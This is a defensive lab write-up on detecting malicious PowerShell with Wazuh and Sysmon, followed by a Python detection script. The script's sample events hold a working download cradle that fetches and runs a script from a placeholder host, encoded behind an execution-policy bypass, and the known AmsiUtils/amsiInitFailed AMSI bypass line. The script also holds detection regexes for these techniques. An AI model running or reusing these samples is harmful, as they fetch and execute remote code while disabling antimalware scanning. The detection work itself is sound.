Suspicious PowerShell Activity
Detect malicious PowerShell execution patterns including encoded commands, download cradles, and AMSI bypass attempts using Wazuh and Sysmon.
Lab Environment
Windows 10 (Target + Wazuh Agent + Sysmon), Windows Server 2022 (DC), Kali Linux (Attacker C2), Wazuh Manager.
Attack Scenario
Simulated post-exploitation scenario in which the attacker ran Base64-encoded PowerShell commands for reconnaissance, pulled additional payloads with a download cradle (Net.WebClient DownloadString piped into IEX, the Invoke-Expression alias), and attempted an AMSI bypass so that the fetched script would not be scanned by the endpoint's antimalware provider.
Detection Method
Sysmon Event ID 1 captured PowerShell process creation with full command-line arguments. Indicators monitored on the command line: -EncodedCommand, -Exec Bypass, IEX, Net.WebClient, DownloadString. Because powershell.exe accepts abbreviated parameter names (-e, -ec and -enc for -EncodedCommand; -ep, -ex and -exec for -ExecutionPolicy) and is case-insensitive, the rules matched these with case-insensitive regexes rather than the full spelling alone. An encoded command exposes only the Base64 blob in Event ID 1, so PowerShell Script Block Logging (Event ID 4104, Microsoft-Windows-PowerShell/Operational channel, forwarded by the Wazuh agent) was used to capture the decoded script content, which also surfaces AMSI bypass attempts such as references to AmsiUtils or amsiInitFailed. Custom Wazuh rules matched these patterns and raised alerts with severity according to the indicator.
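As an added example (not part of the original write-up and not the lab's Wazuh rules), the following Python script reproduces the detection logic described above as a standalone check over constructed sample events: a Sysmon Event ID 1 command line that uses abbreviated parameters (-exec bypass -enc ...), a 4104 script block containing the publicly known AmsiUtils/amsiInitFailed tamper, and two benign events that must not fire. The regexes, the severity levels, the event dictionary layout and the sample 192.0.2.10 URL are assumptions for illustration. The point it shows is that Sysmon alone reveals only the Base64 blob, so the checker decodes the UTF-16LE payload before scanning it, which is the same content Script Block Logging surfaces in 4104.

```python
import base64
import re

# Indicator regexes mirroring the write-up's list (-EncodedCommand, -Exec Bypass,
# IEX, Net.WebClient, DownloadString). Case-insensitive because PowerShell ignores
# case, and powershell.exe accepts abbreviated parameter names (-e, -ec, -enc,
# -ep, -ex ...), so matching only the full spelling misses most real launchers.
ENCODED_ARG = re.compile(r"(?i)(?:^|\s)[-/](?:e|ec|en|enc|enco[a-z]*)\s+([A-Za-z0-9+/=]{8,})")
EXEC_BYPASS = re.compile(r"(?i)(?:^|\s)[-/](?:ep|ex|exe[a-z]*)\s+bypass\b")
CRADLE = re.compile(r"(?i)\biex\b|invoke-expression|net\.webclient|downloadstring")
# Assumed representative AMSI-tampering strings (well-known public patterns); tune as needed.
AMSI = re.compile(r"(?i)amsiutils|amsiinitfailed|amsiscanbuffer|amsi\.dll")

# Assumed severity mapping in the spirit of Wazuh rule levels, not the lab's values.
LEVELS = {"encoded_command": 8, "exec_bypass": 8, "download_cradle": 12, "amsi_bypass": 14}


def encode_command(script: str) -> str:
    """Build what -EncodedCommand expects: Base64 of the UTF-16LE script text
    (equivalent to [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($s)))."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(blob: str):
    """Reverse of encode_command; returns None if the blob is not valid Base64/UTF-16LE."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(event: dict) -> dict:
    """Return the indicators that fire for one event.

    For a Sysmon EID 1 event carrying an encoded command, the Base64 payload is
    decoded and scanned as well, so a download cradle hidden behind -enc still
    yields a 'download_cradle' hit even before the 4104 event arrives."""
    text = event.get("command_line") or event.get("script_block") or ""
    hits, decoded = set(), None
    if event["event_id"] == 1:  # Sysmon process creation: command line only
        m = ENCODED_ARG.search(text)
        if m:
            hits.add("encoded_command")
            decoded = decode_encoded_command(m.group(1))
            if decoded:
                text += "\n" + decoded  # scan the decoded payload too
        if EXEC_BYPASS.search(text):
            hits.add("exec_bypass")
    if CRADLE.search(text):
        hits.add("download_cradle")
    if AMSI.search(text):
        hits.add("amsi_bypass")
    return {"event_id": event["event_id"], "hits": sorted(hits), "decoded": decoded}


def run_detections(events):
    """Evaluate every event and return only those that raised at least one indicator."""
    alerts = []
    for ev in events:
        result = analyze_event(ev)
        if result["hits"]:
            result["level"] = max(LEVELS[h] for h in result["hits"])
            alerts.append(result)
    return alerts


# Constructed sample events (not real lab telemetry).
STAGE2_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/stage2.ps1')"
SAMPLE_EVENTS = [
    # Sysmon EID 1: the attacker's launcher; only the Base64 blob is visible on the command line.
    {"event_id": 1,
     "command_line": "powershell.exe -nop -w hidden -exec bypass -enc " + encode_command(STAGE2_CRADLE)},
    # EID 4104: Script Block Logging shows the decoded text, here the AMSI tamper.
    {"event_id": 4104,
     "script_block": "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')"
                     ".GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)"},
    # Benign administrative activity that must not fire.
    {"event_id": 1, "command_line": r"powershell.exe -ExecutionPolicy RemoteSigned -File C:\scripts\backup.ps1"},
    {"event_id": 4104, "script_block": r"Get-ChildItem C:\Users | Select-Object Name"},
]

if __name__ == "__main__":
    for alert in run_detections(SAMPLE_EVENTS):
        print(alert)
```

The same regexes carry over into Wazuh `<field>` conditions on the command line and script block text (assuming the standard eventchannel field names `win.eventdata.commandLine` for Sysmon and `win.eventdata.scriptBlockText` for 4104). Wazuh rules do not decode Base64 themselves, which is why forwarding the PowerShell Operational channel for Event ID 4104 matters: without it the cradle and the AMSI tamper are invisible to the manager.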